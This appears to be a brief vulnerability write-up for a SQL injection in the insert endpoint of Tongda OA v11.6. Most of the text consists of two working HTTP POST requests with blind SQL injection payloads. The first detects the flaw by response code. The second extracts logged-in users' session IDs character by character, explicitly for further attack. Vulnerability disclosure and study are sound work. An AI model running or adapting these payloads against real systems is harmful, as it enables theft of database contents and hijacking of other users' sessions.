Tongda Oa V11 6 Insert Sql Injection Vulnerability
Tongda Oa V11 6 Insert Sql Injection Vulnerability
Tongda OA v11.6 insert SQL injection vulnerability
Vulnerability Description
Tongda OA v11.6 insert parameter contains SQL injection vulnerability, and attackers can obtain database sensitive information through the vulnerability.
Vulnerability Impact
Tongda OA v11.6
Network surveying and mapping
Vulnerability reappears
Login page
Send request packet judgment vulnerability
1
2
3
4
5
6
7
8
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 77
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
title)values("'"^exp(if(ascii(substr(MOD(5,2),1,1))<128,1,710)))# =1&_SERVER=
Returning 302 means there is a vulnerability, return 500 means there is no
After confirming that there is a vulnerability, obtain SessionID through SQL injection and further attack
1
2
3
4
5
6
7
8
POST /general/document/index.php/recv/register/insert HTTP/1.1
Host:
User-Agent: Go-http-client/1.1
Content-Length: 122
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip
title)values("'"^exp(if(ascii(substr((select/**/SID/**/from/**/user_online/**/limit/**/0,1),8,1))<66,1,710)))# =1&_SERVER=
This post is licensed under CC BY 4.0 by the author.